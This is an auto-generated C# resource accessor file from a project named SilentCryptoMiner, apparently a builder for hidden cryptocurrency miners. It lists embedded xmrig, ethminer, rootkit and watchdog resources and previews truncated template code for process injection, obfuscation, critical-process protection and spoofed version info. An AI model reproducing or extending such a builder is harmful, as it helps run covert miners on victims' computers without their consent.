//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace SilentCryptoMiner.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    public class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        public static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SilentCryptoMiner.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        public static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.IO;
        ///using System.IO.Compression;
        ///using System.Reflection;
        ///using System.Security.Principal;
        ///using System.Security.Cryptography;
        ///using System.Runtime.InteropServices;
        ///using System.Text;
        ///using System.Resources;
        ///using System.Threading;
        ///using System.Diagnostics;
        ///using Microsoft.Win32;
        ///using System.Collections.Generic;
        ///using System.Management;
        ///using System.Linq;
        ///
        ///public partial class Checker
        ///{
        ///    private static void Main()
        ///    {
        ///        try
        ///        {
        ///            i [rest of string was truncated]&quot;;.
        /// </summary>
        public static string Checker {
            get {
                return ResourceManager.GetString("Checker", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] Compilers {
            get {
                object obj = ResourceManager.GetObject("Compilers", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] ddb64 {
            get {
                object obj = ResourceManager.GetObject("ddb64", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        /// </summary>
        public static System.Drawing.Icon Ethereum {
            get {
                object obj = ResourceManager.GetObject("Ethereum", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        public static System.Drawing.Bitmap Ethereum1 {
            get {
                object obj = ResourceManager.GetObject("Ethereum1", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] ethminer {
            get {
                object obj = ResourceManager.GetObject("ethminer", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] Files {
            get {
                object obj = ResourceManager.GetObject("Files", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        /// </summary>
        public static System.Drawing.Icon icon {
            get {
                object obj = ResourceManager.GetObject("icon", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        public static System.Drawing.Bitmap icon1 {
            get {
                object obj = ResourceManager.GetObject("icon1", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
        ///&lt;Localization&gt;
        ///  &lt;Control Name=&quot;tabMain&quot;&gt;
        ///    &lt;Text Lang=&quot;en&quot;&gt;Main&lt;/Text&gt;
        ///    &lt;Text Lang=&quot;sv&quot;&gt;Main&lt;/Text&gt;
        ///    &lt;Text Lang=&quot;pl&quot;&gt;Główne&lt;/Text&gt;
        ///    &lt;Text Lang=&quot;es&quot;&gt;Principal&lt;/Text&gt;
        ///	&lt;Text Lang=&quot;ru&quot;&gt;Основное&lt;/Text&gt;
        ///  &lt;/Control&gt;
        ///  &lt;Control Name=&quot;tabStartup&quot;&gt;
        ///    &lt;Text Lang=&quot;en&quot;&gt;Startup&lt;/Text&gt;
        ///    &lt;Text Lang=&quot;sv&quot;&gt;Uppstart&lt;/Text&gt;
        ///    &lt;Text Lang=&quot;pl&quot;&gt;Start&lt;/Text&gt;
        ///    &lt;Text Lang=&quot;es&quot;&gt;Inicio&lt;/Text&gt;
        ///	&lt;Text Lang=&quot;ru&quot;&gt;Автозапуск&lt;/Text&gt;
        ///  &lt;/Control&gt;
        ///  &lt;Control Name=&quot;tabAssembly&quot;&gt;
        ///    [rest of string was truncated]&quot;;.
        /// </summary>
        public static string LocalizedControls {
            get {
                return ResourceManager.GetString("LocalizedControls", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        public static System.Drawing.Bitmap microsoft_admin {
            get {
                object obj = ResourceManager.GetObject("microsoft_admin", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to #include &quot;UFiles\ntddk.h&quot;
        ///#include &lt;wchar.h&gt;
        ///
        ///#include &quot;UFiles\utils.h&quot;
        ///#include &quot;UFiles\common.h&quot;
        ///#include &quot;UFiles\obfuscate.h&quot;
        ///#include &quot;UFiles\obfuscatew.h&quot;
        ///#include &quot;UFiles\Injection\inject.h&quot;
        ///$RESOURCES
        ///
        ///bool bl = false;
        ///
        ///void set_critical_process(HANDLE pHandle) {
        ///#if DefProcessProtect
        ///    if (!bl) {
        ///        TOKEN_PRIVILEGES privilege = { 1, { 0x14, 0, SE_PRIVILEGE_ENABLED } };
        ///
        ///        HANDLE hToken = NULL;
        ///	    UtOpenProcessToken(UtCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_ [rest of string was truncated]&quot;;.
        /// </summary>
        public static string miner {
            get {
                return ResourceManager.GetString("miner", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        /// </summary>
        public static System.Drawing.Icon Monero {
            get {
                object obj = ResourceManager.GetObject("Monero", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        public static System.Drawing.Bitmap Monero1 {
            get {
                object obj = ResourceManager.GetObject("Monero1", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] nvrtc_builtins64_112 {
            get {
                object obj = ResourceManager.GetObject("nvrtc_builtins64_112", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] nvrtc64_112_0 {
            get {
                object obj = ResourceManager.GetObject("nvrtc64_112_0", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to #ifdef DefIcon
        ///1 ICON &quot;#ICON&quot;
        ///#endif
        ///1 24 &quot;program.manifest&quot;
        ///#ifdef DefAssembly
        ///1 VERSIONINFO
        ///FILEVERSION     #VERSION
        ///PRODUCTVERSION  #VERSION
        ///BEGIN
        ///    BLOCK &quot;StringFileInfo&quot;
        ///    BEGIN
        ///        BLOCK &quot;040904E4&quot;
        ///        BEGIN
        ///            VALUE &quot;CompanyName&quot;, &quot;#COMPANY&quot;
        ///			VALUE &quot;FileTitle&quot;, &quot;#TITLE&quot;
        ///            VALUE &quot;FileDescription&quot;, &quot;#DESCRIPTION&quot;
        ///            VALUE &quot;FileVersion&quot;, &quot;#VERSION&quot;
        ///            VALUE &quot;LegalCopyright&quot;, &quot;#COPYRIGHT&quot;
        ///			VALUE &quot;LegalTrademark&quot;, &quot;#TRADEMARK&quot;
        ///        [rest of string was truncated]&quot;;.
        /// </summary>
        public static string resource {
            get {
                return ResourceManager.GetString("resource", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] rootkit_i {
            get {
                object obj = ResourceManager.GetObject("rootkit_i", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] rootkit_u {
            get {
                object obj = ResourceManager.GetObject("rootkit_u", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?&gt;
        ///&lt;assembly xmlns=&quot;urn:schemas-microsoft-com:asm.v1&quot; manifestVersion=&quot;1.0&quot;&gt;
        ///  &lt;trustInfo xmlns=&quot;urn:schemas-microsoft-com:asm.v3&quot;&gt;
        ///    &lt;security&gt;
        ///      &lt;requestedPrivileges&gt;
        ///        &lt;requestedExecutionLevel level=&quot;#MANIFESTLEVEL&quot;/&gt;
        ///      &lt;/requestedPrivileges&gt;
        ///    &lt;/security&gt;
        ///  &lt;/trustInfo&gt;
        ///  &lt;compatibility xmlns=&quot;urn:schemas-microsoft-com:compatibility.v1&quot;&gt;
        ///    &lt;application&gt;
        ///      &lt;supportedOS Id=&quot;{e2011457-1546-43c5-a5fe-008deee3d3f0}&quot;/&gt;
        ///      &lt;support [rest of string was truncated]&quot;;.
        /// </summary>
        public static string template {
            get {
                return ResourceManager.GetString("template", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.IO;
        ///using System.IO.Compression;
        ///using System.Reflection;
        ///using System.Security.Principal;
        ///using System.Security.Cryptography;
        ///using System.Runtime.InteropServices;
        ///using System.Text;
        ///using System.Resources;
        ///using System.Threading;
        ///using System.Diagnostics;
        ///using Microsoft.Win32;
        ///using System.Collections.Generic;
        ///using System.Management;
        ///using System.Linq;
        ///
        ///public partial class _rUninstaller_
        ///{
        ///    private static string libsPath = Path.Combine(Environment.GetFold [rest of string was truncated]&quot;;.
        /// </summary>
        public static string Uninstaller {
            get {
                return ResourceManager.GetString("Uninstaller", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to #include &quot;UFiles\ntddk.h&quot;
        ///#include &lt;wchar.h&gt;
        ///
        ///#include &quot;UFiles\utils.h&quot;
        ///#include &quot;UFiles\common.h&quot;
        ///#include &quot;UFiles\obfuscatew.h&quot;
        ///
        ///int wmain(int argc, wchar_t* argv[])
        ///{
        ///    HANDLE hMutex;
        ///
        ///    wchar_t mutexTemp[MAX_PATH] = { 0 };
        ///    wcscpy(mutexTemp, AYW_OBFUSCATE(L&quot;\\BaseNamedObjects\\#WATCHDOGID&quot;));
        ///    UNICODE_STRING umutex;
        ///    INIT_UNICODE_STRING(umutex, mutexTemp);
        ///
        ///    OBJECT_ATTRIBUTES attr;
        ///    InitializeObjectAttributes(&amp;attr, &amp;umutex, 0, NULL, NULL);
        ///
        ///    UtCreateMutant(&amp;hMut [rest of string was truncated]&quot;;.
        /// </summary>
        public static string watchdog {
            get {
                return ResourceManager.GetString("watchdog", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] WinRing0x64 {
            get {
                object obj = ResourceManager.GetObject("WinRing0x64", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] xmrig {
            get {
                object obj = ResourceManager.GetObject("xmrig", resourceCulture);
                return ((byte[])(obj));
            }
        }
    }
}
